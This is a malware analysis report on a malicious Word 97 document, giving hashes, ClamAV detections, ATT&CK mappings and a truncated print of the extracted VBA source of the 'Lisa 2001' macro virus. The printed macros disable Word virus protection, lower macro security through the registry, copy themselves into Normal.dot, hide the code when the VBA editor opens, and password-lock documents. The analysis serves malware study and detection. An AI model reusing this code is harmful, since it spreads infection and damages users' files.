Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c6812f83f6691eec…

MALICIOUS

Office (OLE)

43.5 KB Created: 1997-07-07 09:37:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 1d94cde3b6a205d9d44eff7b0fdb7093 SHA-1: 693c57216c1de850c3b21fa4816fc114b05fa1bd SHA-256: c6812f83f6691eecdd1c2d31307dd0db432b4cc3fd534d4c2475a897b6d4dccb
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros, specifically a Document_Open macro designed to disable macro security and inject its code into the Normal.dot template. This persistence mechanism aims to ensure the macro runs automatically with future Word documents. The ClamAV detections 'Doc.Trojan.Lis-2' and 'Doc.Trojan.Lily-2' further indicate malicious intent.

Heuristics 3

  • ClamAV: Doc.Trojan.Lis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Lis-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 33988 bytes
SHA-256: 182150127378076f732f169c79645178c2f0317a5496216b91ebd9791b9f6701
Detection
ClamAV: Doc.Trojan.Lily-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

'L i s a 2001
'Все пожелания (а также новые вири) слать на Slava_Atrancev@mail.ru
Dim dvl
Private Sub Document_Close()
 dvl = 2
 p
End Sub
Private Sub Document_New()
 dvl = 3
 p
End Sub
Private Sub Document_Open()
 dvl = 1
 p
End Sub

Private Sub p()
 '___Включаем генератор случайных чисел___'
 Randomize
 '___Вырубаем ошибки___'
 On Error Resume Next
 '___Отключение защиты от вирусов для ворда 97___'
 Application.Options.VirusProtection = False
 '___Отключение защиты от вирусов для ворда 2000___'
 System.PrivateProfileString("", "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\Word\Security", "level") = 1
 If ThisDocument.Name <> "Normal.dot" Then
  '___Если выполняется не из нормала то ...___'
  '___Вытираем нормал дот___'
  a = Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
  NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, a
  '___Пишем в нормал дот наш код___'
  a = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
  b = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, a)
  NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines 1, b
  '___Добавляем в нормал технологию стелс___'
  c = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
  NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 1, "Sub viewvbcode()"
  NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 2, "On Error Resume Next"
  NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 3, "a = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines"
  NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 4, "NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, a"
  NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 5, "NormalTemplate.Saved = True"
  NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 6, "c = Application.Documents.Count"
  NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 7, "For i = 1 To c"
  NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 8, "d = Application.Documents.Item(i).VBProject.VBComponents.Item(1).CodeModule.CountOfLines"
  NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 9, "If d > 0 Then"
  NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 10, "Application.Documents.Item(i).VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, d"
  NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 11, "Application.Documents.Item(i).Saved = True"
  NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 12, "End If"
  NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 13, "Next i"
  NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 14, "Application.ShowVisualBasicEditor = True"
  NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 15, "End Sub"
  '___Мелкая пакость антивирусникам, при закрытии паролируем документ на изменение, а при открытии снимаем пароль и после лечения, юзверь не сможет юзать этот файл___'
  If dvl = 2 Then
   ThisDocument.Protect Type:=wdAllowOnlyFormFields, Password:="qvssqfxocisi"
  End If
  If dvl = 1 Then
   ThisDocument.Unprotect Password:="qvssqfxocisi"
   aa = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
   cc = ""
   For dd = 1 To 12
    ee = 0
    Do While ee < 97
    '___Генерируем пароль случайным образом___'
     ee = Int((122 * Rnd) + 1)
    Loop
    cc = cc + Chr(ee)
   Next dd
   For bb = 1 To aa
    nn = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(bb, 1)
    If Mid(nn, 1, 63) = "   Th
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.